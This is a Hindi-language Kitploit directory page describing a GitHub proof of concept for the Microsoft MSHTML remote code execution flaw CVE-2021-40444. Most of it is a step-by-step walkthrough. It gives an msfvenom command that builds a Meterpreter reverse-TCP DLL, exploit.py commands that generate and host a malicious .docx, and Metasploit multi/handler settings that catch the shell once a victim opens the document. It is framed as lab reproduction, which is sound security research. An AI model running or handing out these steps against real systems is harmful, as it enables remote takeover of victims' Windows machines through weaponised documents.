Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-40444-POC — Microsoft MSHTML रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता को पुनरुत्पादित करने का एक प्रयास और Metasploit Framework का उपयोग करना। | Kitploit
उपकरण/GitHubGitHub/kagura-maru/cve-2021-40444-poc
शोषण फ्रेमवर्कपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubkagura-maru/cve-2021-40444-poc

CVE-2021-40444-POC

Microsoft MSHTML रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता को पुनरुत्पादित करने का एक प्रयास और Metasploit Framework का उपयोग करना।

रिपॉजिटरी देखें
10134 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-40444-POC

मेटास्प्लॉइट फ्रेमवर्क का उपयोग करके Microsoft MSHTML रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता को पुन: उत्पन्न करने का एक प्रयास।

यदि FlareVM में नहीं चलाया जाए तो सबसे अच्छा काम करता है

तैयारी

रिपॉजिटरी को https://github.com/lockedbyte/CVE-2021-40444 से क्लोन करें

बाद में msfvenom के साथ उपयोग के लिए .dll टेम्पलेट तैयार करें

msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll

हाल ही में बनाए गए template.dll को रिपॉजिटरी के test/ फ़ोल्डर में कॉपी करें template.dll को chmod +x template.dll द्वारा निष्पादन योग्य अनुमति दें

स्क्रिप्ट चलाएँ ताकि को में प्रोसेस किया जा सके

template.dll
output
python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>

लिसनर

फिर दस्तावेज़ out/ फ़ोल्डर में निर्यात किया जाएगा और हम अपने HTTP पोर्ट (डिफ़ॉल्ट 80 है) पर एक लिसनर बना सकते हैं python3 exploit.py host 80

मेटास्प्लॉइट को इसके साथ चलाएँ msfconsole -q use multi/handler set payload windows/meterpreter/reverse_tcp set lhost <SOURCE IP> run

पेलोड

फिर हम document.docx को अपनी असुरक्षित मशीन पर भेज सकते हैं और .docx को निष्पादित कर सकते हैं

हमें exploit.py टर्मिनल में प्रतिक्रिया मिलेगी और यदि हम रिवर्स टीसीपी शेल उत्पन्न (स्पॉन) करने में सक्षम होते हैं, तो लैब सफल मानी जाती है।

टूल डाउनलोड करें